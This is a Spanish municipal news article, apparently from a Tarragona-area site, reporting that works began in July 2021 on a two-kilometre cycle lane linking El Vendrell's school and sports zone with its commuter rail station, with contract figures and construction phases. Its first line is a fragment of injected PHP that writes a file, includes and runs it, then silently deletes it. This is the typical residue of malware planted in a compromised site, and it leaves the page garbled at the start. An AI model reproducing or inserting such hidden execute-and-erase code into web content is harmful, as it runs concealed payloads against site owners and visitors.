");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Se inician las obras de la vía ciclista entre la zona escolar-deportiva y la Estación de Cercanías de El Vendrell
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Se inician las obras de la vía ciclista entre la zona escolar-deportiva y la Estación de Cercanías de El Vendrell (12/07/2021)

Los trabajos se inician hoy lunes 12 de julio, aprovechando el periodo estival, desde la zona deportiva-escolar hasta llegar a la Estación de Cercanías de El Vendrell y se ejecutarán en un plazo previsto de 5 meses.

El pasado 7 de junio el Ayuntamiento de El Vendrell adjudicó el contrato de las obras de reforma de la red viaria local e infraestructuras para la Implantación de una vía ciclista urbana entre la zona escolar-deportiva y la estación de cercanías del municipio el Vendrell en la empresa GESTION INGENIERÍA Y CONSTRUCCIÓN dE lA COSTA DORADA SA, por un importe de 275.770,40 euros, IVA excluido, más 57.911,78 euros de IVA. Esta actuación está cofinanciada por el fondo FEDER 2014-2020.

El itinerario ciclista tendrá una longitud total de unos dos kilómetros, desarrollándose en carril bici y, en algunos tramos, en acera bici, principalmente en aquellos puntos en que por seguridad vial de los ciclistas está recomendado que sea así (intersecciones no reguladas por semáforos o rotondas).

Gracias a esta vía, se conectará el casco urbano del municipio de lado a lado, comunicando la estación de ferrocarril de El Vendrell y la estación de autobuses con el acceso a la vía verde que llega a los núcleos de las playas, la zona escolar y la zona deportiva, pasando por otros equipamientos de interés, como son los Juzgados.

Las obras se llevarán a cabo en varias fases. Las primeras en llevarse a cabo serán:

FASE 1: Tramo 1-2-3 (de finales de julio a mediados de agosto): Calle Salvador Palau Rabassó (primer tramo); Plaza Àngels Garriga y Calle Salvador Palau Rabassó (segundo tramo).

El tramo 4 corresponde al ya existente: Ctra.Sant Vicente y C.Josep Ma Altet Fuente.

FASE 2 (parcial): Tramo 5-6-7-8 (de mitad de agosto a mediados de septiembre): Calle Josep Maria Rovirosa y Ribot (1er tramo); Calle Josep Maria Rovirosa y Ribot (2º tramo); Calle Francisco de Riera y Último tramo y rotonda C.Francesc de Riera con Ctra.Tarragona.


Durante los trabajos se pueden producir pequeñas afectaciones a la movilidad que se señalizarán debidamente de acuerdo a las necesidades.


Para más información se puede consultar la página web: https://www.elvendrell.net/via-ciclista

Se inician las obras de la vía ciclista entre la zona escolar-deportiva y la Estación de Cercanías de El Vendrell

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona